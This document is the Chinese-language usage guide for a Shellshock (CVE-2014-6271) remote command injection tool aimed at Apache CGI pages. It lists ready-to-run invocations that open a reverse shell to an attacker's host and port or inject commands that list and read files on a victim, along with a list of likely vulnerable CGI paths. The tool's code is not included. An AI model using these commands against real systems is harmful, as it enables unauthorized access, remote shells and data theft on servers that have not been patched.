[CVE-2014-6271] Apache Shellshock远程命令注入工具,用于快速反弹Shell和文件浏览
Shellshock Apache远程利用
用法:
./Shellshock.py payload=reverse rhost=1.2.3.4 page=3 lhost=5.6.7.8 lport=1234
./Shellshock.py payload=files rhost=1.2.3.4 page=3 echo="ls -la"
./Shellshock.py payload=files rhost=1.2.3.4 page=3 echo="cat file.txt"
变量:
受害者:
rhost => 受害者IP
rport => 受害者端口
攻击者(用于反弹Shell):
lhost => 攻击者IP
lport => 攻击者用于反弹Shell的端口
Echo:
echo => 自定义要注入的命令
示例:
echo="ls -la"
echo="cat file.txt"
配置:
pages => 特定存在漏洞的CGI页面
可利用的页面:
[0] /cgi-sys/entropysearch.cgi",
[1] /cgi-sys/defaultwebpage.cgi",
[2] /cgi-mod/index.cgi",
[3] /cgi-bin/test.cgi",
[4] /cgi-bin-sdb/printenv
载荷:
"reverse" => (Unix通用) TCP反弹Shell (需要:rhost, lhost, lport)
"files" => 读取和浏览文件 (需要:rhost, echo)
作者:Filip Studený